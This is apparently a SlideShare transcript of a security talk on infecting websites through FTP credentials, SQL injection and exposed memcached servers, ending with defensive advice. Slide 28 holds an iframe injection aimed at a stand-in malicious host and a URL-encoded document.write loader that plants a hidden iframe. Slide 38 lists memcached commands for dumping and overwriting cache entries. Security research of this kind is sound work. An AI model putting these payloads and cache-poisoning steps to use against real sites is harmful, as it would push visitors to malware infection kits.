[FTP|SQL|Cache] Injections

4,716 views

Published on

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
4,716
On SlideShare
0
From Embeds
0
Number of Embeds
2,654
Actions
Shares
0
Downloads
0
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

[FTP|SQL|Cache] Injections

  1. 1. [FTP|SQL|Cache] Injections David BarrosoHead of Security Intelligence Telefonica Digital
  2. 2. ddddddasdfsdf 27% 73%http://www.iframeinjectionattack.com/how-to-remove-this-site-may-harm-your-computer.html
  3. 3. IntroductionCache basicsDemoSummary
  4. 4. How can I infect a web?Or, how can I forward visitors to a controlled webpage? Pág. 4
  5. 5. MPack The attacker compromises a Attacker website and injects The malcode an iFrame connects back to the C&C C&C iFRAME Infection kit Servidor Web legítimo www.mydomain.com) The visitor is forwarded to an infection kit The visitor browses a normal website (with User a malicious iframe) Pág. 5
  6. 6. First optionDifficulty: easy Pág. 6
  7. 7. Pág. 7
  8. 8. Pág. 8
  9. 9. SQL InjectionDifficulty: easy Pág. 9
  10. 10. Pág. 10
  11. 11. Pág. 11
  12. 12. Pág. 12
  13. 13. Pág. 13
  14. 14. A tener en cuenta Which users do I want to infect?  Focus your efforts  Example: brazilian webpages SEO and web ranking  Alexa Ranking It’s not only about infection  Sometimes is only about web ranking  Spam comments in blogs  Playing with HTML entities(ex. <noscript>) Pág. 14 Pág. 14
  15. 15. Second optionsDifficulty: medium Pág. 15
  16. 16. Pág. 16
  17. 17. Pág. 17
  18. 18. Pág. 18
  19. 19. Pág. 19
  20. 20. Pág. 20
  21. 21. Pág. 21
  22. 22. Choose your preferredinfection kit99% LAMP: Linux + Apache + Mysql + PHP Pág. 22
  23. 23. Pág. 23
  24. 24. Pág. 24
  25. 25. Pág. 25
  26. 26. Pág. 26
  27. 27. Pág. 27
  28. 28. ddddddasdfsdf Simple: <iframe src=‘http://www.malicious.com’></iframe> Not so simple:<Script Language=Javascript> 27% document.write(unescape(%3C%69%66%72%61%6D%65%20%73%72%6 73%3%3D%20%68%74%74%70%3A%20%2F%2F%67%6F%6F%6F%6F%67%6C%65%61%64%73%65%6E%63%65%2E%62%69%7A%2F%5F%63%6C%69%63%6B%3D%38%46%39%44%41%20%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%20%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%20%3E%3C%2F%69%66%72%61%6D%65%3E));</Script>
  29. 29. And how a web cache isrelated?Specifically: memcached Pág. 29
  30. 30. ddddddasdfsdfCache A component that transparently stores data so that future requests for that data can be served faster. The data that is stored within a cache might be values that have been computed earlier or duplicates of original values that are stored27% elsewhere. (Wikipedia) 73% Examples: CPU, Disk, DNS, ARP, etc. Main security attack: poisoning
  31. 31. ddddddasdfsdf 73% 27%
  32. 32. ddddddasdfsdf  Created on 2003 forLiveJournal  Associative array(hash table)  YouTube, Reddit, FaceBook, Orange, Twitter, etc.27%  Memory-based  Keys (250b), Values (1MB) 73%  Default port: 11211/tcp  No authentication  Some caches are on the Internet  Optional(not often used): SASL
  33. 33. ddddddasdfsdf Telnet based commands Commands  Set (flags timeout bytes)  Get  Stats 27%  Items  Cachedump 73%
  34. 34. ddddddasdfsdf Sensepost analyzed the security issues back on 2010 They developed go-derper.rb  Identifcation  Storage of k keys and values  Regular expressiones 27%  It can overwrite existing keys and values 73% Main problems  Which web app is using these data?  How can I find ‘interesting’ data?
  35. 35. InfectionsiFrame/JS maliciousinjectionConfidential informationPasswordsPrices!
  36. 36. Let’s see some practicalstuffTake care with all those memcached! Pág. 37
  37. 37. ddddddasdfsdfDemo Memcached access 27% Key/value storage 73%
  38. 38. ddddddasdfsdf set FIRST 0 0 11  Hello FIRST get FIRST stats items 27% stats cachedump n 10 73%
  39. 39. ddddddasdfsdfDemo Overwriting values 27% (iFrame – infection kit) 73%
  40. 40. ddddddasdfsdf iFrame injection 27% 73%
  41. 41. ddddddasdfsdfDemo Password sniffing 27% Data mangling (prices) 73%
  42. 42. ddddddasdfsdf Password sniffing 27% 73%
  43. 43. ddddddasdfsdf Data mangling (prices) 27% 73%
  44. 44. ddddddasdfsdf Data mangling (prices) 27% 73%
  45. 45. ddddddasdfsdf 27% 73%Source: http://www.sensepost.com/blog/4873.html
  46. 46. ddddddasdfsdf CacheT: an alternative to FTP-Toolz and SQL Injection Kitz go-derper.rb patch Proof of concept 27% Once you find some memcached hosts(nmap) 73% entries  Dump of all their  Look for HTML data  Malicious injection (iFrame/JavaScript) Not published yet (only malicious purposes)
  47. 47. ddddddasdfsdf Protect your memcached from external access  Firewall  Listen only to localhost We haven’t seen malicious infections using theses caches  But it’s a very attractive asset, because many of the large 27% websites are using it  From the malicious point of view, it doesn’t mind if you don’t 73% know which webapp is behind It’s very easy to code a tool scanning for open memcached (or similar caches) and then infect all of them  nmap + go-derper.rb
  48. 48. ObrigadoDavid Barroso @lostinsecurity

×